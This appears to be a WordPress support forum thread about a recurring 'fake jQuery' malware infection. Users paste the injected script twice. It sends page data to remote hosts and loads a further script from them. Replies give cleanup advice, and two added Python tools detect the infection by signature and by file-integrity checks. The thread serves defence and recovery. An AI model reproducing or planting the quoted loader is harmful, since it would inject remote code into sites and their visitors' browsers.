• Hi, recently most of my WordPress sites got infected with malware.

    Problems:

    After scanning my sites on https://sitecheck.sucuri.net/ I receive the message as below:

    Known javascript malware. Details: https://sucuri.net/malware/entry/MW:JS:GEN2?web.js.malware.fake_jquery.001
<script>var a=''; setTimeout(10); var default_keyword = encodeURIComponent(document.title); var se_referrer = encodeURIComponent(document.referrer); var host = encodeURIComponent(window.location.host); var base = "https://geralddeanmandiri.com/js/jquery.min.php"; var n_url = base + "?default_keyword=" + default_keyword + "&se_referrer=" + se_referrer + "&source=" + host; var f_url = base + "?c_utt=snt2014&c_utm=" + encodeURIComponent(n_url); if (default_keyword !== null && default_keyword !== '' && se_referrer !== null && se_referrer !== ''){document.write('<script type="text/javascript" src="' + f_url + '">' + '<' + '/script>');}</script>

    I tried to install the Wordfence plugin (and turn on all the options in this plugin) to scan my sites, but it couldn't detect the malware.

    I then went to edit my theme in the editor section, opened the header.php file and looked for the malware script just before the </head> tag.

    I then removed the script and saved the file.

    Results

    By removing the script before the </head> tag of the header.php file, it worked for some websites and it didn’t work for other sites.

    I ran the scan on https://sitecheck.sucuri.net/ again; some of my sites were safe and some still had that malware script on categories, pages or even on URLs that don't exist on my blog.

    Problems

    The sites that I removed the malware script from and were marked safe had the malware come back on the next day!

    Maybe the malware is somewhere on my server or something and it keeps injecting the malware script into my blog even when I removed it?

    Question

    How do I solve this problem and remove this stupid malware for good? What plugin do you recommend? What cleaning method do you suggest?

    Thank you everyone!

    Please help!

Viewing 15 replies - 1 through 15 (of 18 total)
  • Sucuri has a 404 page for that malware definition and I hope it is updated soon.

    the page is here: https://labs.sucuri.net/signatures/malware-entry-mwjsgen2
    did you manage to clean up your website?

    Thread Starter liemng007

    (@liemng007)

    Yes, I cleaned it up by removing the script from the theme editor and it was fine for 1 week, and now it's back again! Any better way please?

    The same here. Still looking for code to clean.

    It's possible the hacker may have added the code into the actual page or post.

    Go to the page or post in question and view as text, then scroll down.

    Same problem here. Every day the code is back.

    My wp-includes/nav-menu.php was infected with strange code, I removed that code. Further I found a strange PHP-file (license.php) in wp-includes/Text/.

    All removed and still code is coming back. I will keep searching.

    In the audit log of plugin Sucuri Security I saw that user ‘system’ with IP ::1 changed the header.php of my template again yesterday evening.

    Thread Starter liemng007

    (@liemng007)

    Yes, I removed it from the theme header (header.php) and it's all good, then the next day it comes back again.

    Here’s the new code:

    <script>var a=''; setTimeout(10); var default_keyword = encodeURIComponent(document.title); var se_referrer = encodeURIComponent(document.referrer); var host = encodeURIComponent(window.location.host); var base = "https://wildwillis.net/js/jquery.min.php"; var n_url = base + "?default_keyword=" + default_keyword + "&se_referrer=" + se_referrer + "&source=" + host; var f_url = base + "?c_utt=snt2014&c_utm=" + encodeURIComponent(n_url); if (default_keyword !== null && default_keyword !== '' && se_referrer !== null && se_referrer !== ''){document.write('<script type="text/javascript" src="' + f_url + '">' + '<' + '/script>');}</script>

    Does anyone know how to solve this problem please?

    Having the same issue – any recommendations on how to fix it?

    If the malware continues to reappear after you've removed the offending script, then there must be some vulnerable software on your site, a compromised password, an injected backdoor or a bogus wp-admin administrator user that is being used to reinfect it.

    Once you remove the malicious script be sure to:

    1) Update all software (WP core, plugins and themes)
    2) Change all administrator passwords (wp-admin, FTP, cPanel, etc)
    3) Check for any bogus wp-admin administrator users

    If the problem continues I would recommend replacing your core WordPress files. It also wouldn’t hurt to reinstall your plugins/themes in the event that there is some injected backdoor there.

    There are also some common places to hide backdoors like in these directories:

    ./wp-content
    ./wp-content/plugins
    ./wp-content/themes

    Often the index.php file in those directories gets overwritten, or they add some file with a name like plugin.php or css.php or something like that, but there are many other places they can hide.

    This article goes into some more detail:

    https://blog.sucuri.net/2015/11/jquery-min-php-malware-affects-thousands-of-websites.html

    I hope that helps.
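    Added example (not from this thread or from Sucuri): a detection-only scanner that walks a WordPress install and flags any file carrying the fake-jQuery loader structure shown in the posts above, so reinfected copies in theme, plugin or core files such as nav-menu.php can be located without opening each file by hand. The sample site it builds, including the loader.example hostname, is constructed for the demo.

```python
# Added example (not the thread's or Sucuri's code): locate files carrying the
# fake-jQuery loader quoted above. Detection only; it edits nothing.
import re
import tempfile
from pathlib import Path

# Markers taken from the snippet posted in the thread. The loader hostname
# changes between infections, so match on structure, not on a domain.
FAKE_JQUERY_MARKERS = [
    re.compile(r"/js/jquery\.min\.php", re.I),
    re.compile(r"c_utt=snt2014", re.I),
    re.compile(r"default_keyword\s*=\s*encodeURIComponent\(document\.title\)", re.I),
]
SCAN_SUFFIXES = {".php", ".js", ".html", ".htm"}

def scan_text(text):
    """Return the marker patterns present in one file's contents."""
    return [m.pattern for m in FAKE_JQUERY_MARKERS if m.search(text)]

def scan_tree(root):
    """Return {relative_path: [markers]} for every suspicious file under root."""
    root = Path(root)
    hits = {}
    for path in root.rglob("*"):
        if not path.is_file() or path.suffix.lower() not in SCAN_SUFFIXES:
            continue
        found = scan_text(path.read_text(encoding="utf-8", errors="ignore"))
        if found:
            hits[str(path.relative_to(root))] = found
    return hits

def build_sample_site(root):
    """Constructed fixture mirroring the thread: an injected header.php, an
    injected core file (nav-menu.php) and one clean theme file."""
    root = Path(root)
    (root / "wp-content/themes/demo").mkdir(parents=True)
    (root / "wp-includes").mkdir(parents=True)
    injected = ('<script>var base = "https://loader.example/js/jquery.min.php";'
                'var f_url = base + "?c_utt=snt2014&c_utm=";</script>')
    (root / "wp-content/themes/demo/header.php").write_text("<head>" + injected + "</head>")
    (root / "wp-content/themes/demo/footer.php").write_text("<footer>clean</footer>")
    (root / "wp-includes/nav-menu.php").write_text("<?php echo 1; ?>" + injected)
    return root

def demo():
    """Build the constructed fixture in a temp directory and scan it."""
    return scan_tree(build_sample_site(tempfile.mkdtemp()))

if __name__ == "__main__":
    for rel, markers in demo().items():
        print(rel, "->", markers)
```

    Run it against a real install with scan_tree("/path/to/wordpress"); a hit in a core file means that file should be replaced from a fresh download, not just edited.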

    Thread Starter liemng007

    (@liemng007)

    Hi rngdmstr, I saw that article and I removed the malware from header.php and updated everything. However, the malware still comes back.

    That article also says "check for the jquery.min.php in the /js directory."

    I tried to find that code in the js directory but it's not there. I'm not sure where on the server the malware gets injected automatically again.

    Thanks for your suggestion anyway.

    Any other advice would be greatly appreciated.

    Hi Everyone,

    I too was having the same problem with several of my websites. I think I have found the solution, since the malware hasn’t returned yet.

    1. Change your cPanel password and, to be safe, change your WordPress password. I realized after removing the malware that it was always returning, which means there was a script file added to my server that wasn't showing up on the malware scan.

    2. Download the Sucuri malware plugin. Once the plugin is installed and you get your API key, go to the Sucuri dashboard. There will be a red/pink box informing you that there has been a change made to your WordPress core files. Delete any files you do not recognize (the file will be something very deceiving, like .ftpquota). (This will delete the script file that keeps reinstalling the malware on your website.) You can do a malware scan and pay to have Sucuri remove the malware. I'm not sure how much it costs; if you do not want to pay, head to step 3.

    3. Download the Anti-Malware plugin, get your API key and download the newest definitions. Run a complete website scan; it should find the malware, and remove it once it is finished downloading. I would suggest donating the $29 for such an awesome plugin! Most companies will charge $200+ to remove the malware.

    These are the steps I took to clean my sites. If there is any change to any of my sites I will reply with the new changes I have made, or if anyone needs any help feel free to contact me.

    Thank you
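    Added example (not from this thread or from the Sucuri plugin): a minimal file-integrity baseline of the kind behind the "core files changed" notice described in step 2. Taking a SHA-256 manifest of a clean install and diffing it after the fact surfaces a re-edited header.php and hidden droppers such as .ftpquota or wp-includes/Text/license.php even when a signature scan misses them. The install it builds is constructed for the demo.

```python
# Added example (not the thread's or Sucuri's code): baseline a WordPress tree
# and report added, removed and modified files on a later check. Detection only.
import hashlib
import json
import tempfile
from pathlib import Path

def hash_file(path):
    """SHA-256 of one file, streamed so large uploads do not load into memory."""
    h = hashlib.sha256()
    with open(path, "rb") as fh:
        for chunk in iter(lambda: fh.read(65536), b""):
            h.update(chunk)
    return h.hexdigest()

def build_manifest(root):
    """Map every file under root (dotfiles included) to its SHA-256."""
    root = Path(root)
    return {str(p.relative_to(root)): hash_file(p)
            for p in sorted(root.rglob("*")) if p.is_file()}

def diff_manifest(baseline, current):
    """Return sorted lists of added, removed and modified relative paths."""
    added = sorted(set(current) - set(baseline))
    removed = sorted(set(baseline) - set(current))
    modified = sorted(p for p in baseline if p in current and baseline[p] != current[p])
    return {"added": added, "removed": removed, "modified": modified}

def demo():
    """Constructed scenario mirroring the thread: baseline a clean install,
    then simulate reinfection (header.php edited, a hidden .ftpquota dropper
    and wp-includes/Text/license.php added) and diff against the baseline."""
    root = Path(tempfile.mkdtemp())
    (root / "wp-content/themes/demo").mkdir(parents=True)
    (root / "wp-includes/Text").mkdir(parents=True)
    (root / "wp-content/themes/demo/header.php").write_text("<head></head>")
    (root / "wp-includes/version.php").write_text("<?php $wp_version = 'x'; ?>")
    baseline = build_manifest(root)          # taken while the site is clean
    (root / "wp-content/themes/demo/header.php").write_text("<head><script>bad</script></head>")
    (root / ".ftpquota").write_text("<?php /* placeholder dropper */ ?>")
    (root / "wp-includes/Text/license.php").write_text("<?php /* placeholder */ ?>")
    return diff_manifest(baseline, build_manifest(root))

if __name__ == "__main__":
    print(json.dumps(demo(), indent=2))
```

    Store the baseline manifest off the web server (an attacker who can write files can also rewrite a manifest kept beside them) and re-run the diff on a schedule.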

    liemng007 does this site reside in the same hosting environment as other websites? Is it a shared hosting environment? The issue might be cross-contamination:

    https://blog.sucuri.net/2012/03/a-little-tale-about-website-cross-contamination.html

    I've solved the issue by installing the Sucuri plugin and "hardening" the directories wp-content and wp-includes.

    I already deleted the injected code in my header.php, but when I scan my website it seems like it is still in some of my pages:
    https://sitecheck.sucuri.net/results/bnacedu.com

    Can anyone help me?

    @24eagle1989 the malicious code could be in a few different places, but it’s common to find this infection within theme files. Try uploading a fresh copy of your theme and see if that helps. Be sure to flush any cache you are using on the site before rescanning with Sitecheck.

  • The topic ‘WordPress Blog Infected With Malware – Malware.fake_jquery.001’ is closed to new replies.